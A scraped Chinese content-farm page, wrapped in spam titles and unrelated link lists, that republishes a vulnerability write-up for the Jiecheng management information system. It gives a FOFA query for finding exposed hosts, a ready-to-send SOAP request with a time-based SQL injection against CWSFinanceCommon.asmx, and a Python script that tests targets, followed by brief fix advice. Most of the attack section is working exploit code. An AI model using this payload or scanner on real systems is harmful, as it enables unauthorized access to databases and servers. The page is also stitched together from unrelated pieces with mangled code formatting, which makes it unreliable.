当前位置: 首页 > news >正文

专业做生鲜的网站好为女朋友做网站

news 2025/12/7 7:19:46
专业做生鲜的网站好,为女朋友做网站,自己电脑做电影网站,物流公司网站制作模板声明 本文仅用于技术交流#xff0c;请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;文章作者不为此承担任何责任。 一、产品介绍 捷诚管理信息系统是一款功能全面#xff0c;可以支持自…声明 本文仅用于技术交流请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责文章作者不为此承担任何责任。 一、产品介绍 捷诚管理信息系统是一款功能全面可以支持自营、联营到外柜租赁的管理其自身带工作流管理工具能够帮助企业有效的开展内部审批工作。 二、漏洞描述 该系统CWSFinanceCommon.asmx接口存在SQL注入漏洞。未经身份认证的攻击者可以通过该漏洞获取数据库敏感信息深入利用可获取服务器权限。 三、fofa语法 body/Scripts/EnjoyMsg.js 四、漏洞复现 重放 poc POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 Connection: close Content-Length: 369 Accept: */* Accept-Language: en Content-Type: text/xml; charsetutf-8 Accept-Encoding: gzip?xml version1.0 encodingutf-8? soap:Envelope xmlns:xsihttp://www.w3.org/2001/XMLSchema-instance xmlns:xsdhttp://www.w3.org/2001/XMLSchema xmlns:soaphttp://schemas.xmlsoap.org/soap/envelope/soap:BodyGetOSpById xmlnshttp://tempuri.org/sId1;waitfor delay 0:0:5--/sId/GetOSpById/soap:Body /soap:Envelope python检测脚本 import timeimport requestsdef verify(ip):url f{ip}EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmxheaders {User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36,Connection: close,Content-Length: 369,Accept: */*,Accept-Language: en,Content-Type: text/xml; charsetutf-8,Accept-Encoding: gzip,}payload ?xml version1.0 encodingutf-8?soap:Envelope xmlns:xsihttp://www.w3.org/2001/XMLSchema-instance xmlns:xsdhttp://www.w3.org/2001/XMLSchema xmlns:soaphttp://schemas.xmlsoap.org/soap/envelope/soap:BodyGetOSpById xmlnshttp://tempuri.org/sId1;waitfor delay 0:0:5--/sId/GetOSpById/soap:Body/soap:Envelopetry:start_time time.time()response requests.post(url, headersheaders, datapayload,verifyFalse)end_time time.time()res_time end_time - start_time# 验证成功输出相关信息if response.status_code 200 and res_time 5 and res_time 8:print(f{ip}存在捷诚管理信息系统SQL注入漏洞)except Exception as e:passif __name__ __main__:self input(请输入目标主机IP地址)verify(self) 使用方法 五、修复建议 尽快修复漏洞更新系统 设置访问控制策略
http://wiki.neutronadmin.com/news/272427/

相关文章:

  • 部门网站建设目的视频点播网站开发教程
  • 彩票网站是静态动态西安俄语网站建设
  • 苏州网站设计哪家公司好wordpress图片标签
  • 邢台网站建设信息西安建网站价格低
  • 帝国 网站搬家企业网站建设知识
  • 工业园区网站建设方案网站开发经理岗位职责
  • 手机网站与app的区别推荐个好看的网站
  • 哈尔滨百度网站建设做外贸推广的平台
  • 网站关键词排名下降受欢迎的郑州网站建设
  • 深南花园裙楼 网站建设宁波企业建网站报价
  • 官方网站建设方案合肥优化排名推广
  • 网站建设undefined网站建设所需基本资料
  • 做脚本从网站引流WordPress注册界面文字
  • 中国太空空间站鲲鹏建设集团有限公司网站
  • 如何建网站并做推广新会新闻官网
  • 建设银行宁夏分行网站网站建设无锡海之睿
  • 电影网站app怎么做的网站已经编辑好了 上线准备哪些工作
  • 建公司网站建设明细报价表仙踪林老狼网站欢迎您拍照
  • 网站原型图设计济南电子商务网站开发
  • 网站后台管理系统安装网页小游戏无需登录
  • 泗县口碑营销互联网营销推荐咨询seo建设网站
  • 融资计划书郑州网站seo
  • 书城网站开发新密做网站
  • 铁哥们网站建设注册网站手机号收验证码
  • 推广公司网站有哪些方式net网站开发框架
  • 三 网站开发使用软件环境腾讯云镜像安装wordpress
  • 公司网站建设的目的和意义用flash做网站建设
  • 和先锋影音和做的网站软件开发工资一般多少深圳
  • 晋江论坛怎么搜索帖子147seo采集工具
  • 专业做视频的网站有哪些泰安建设工程招聘信息网站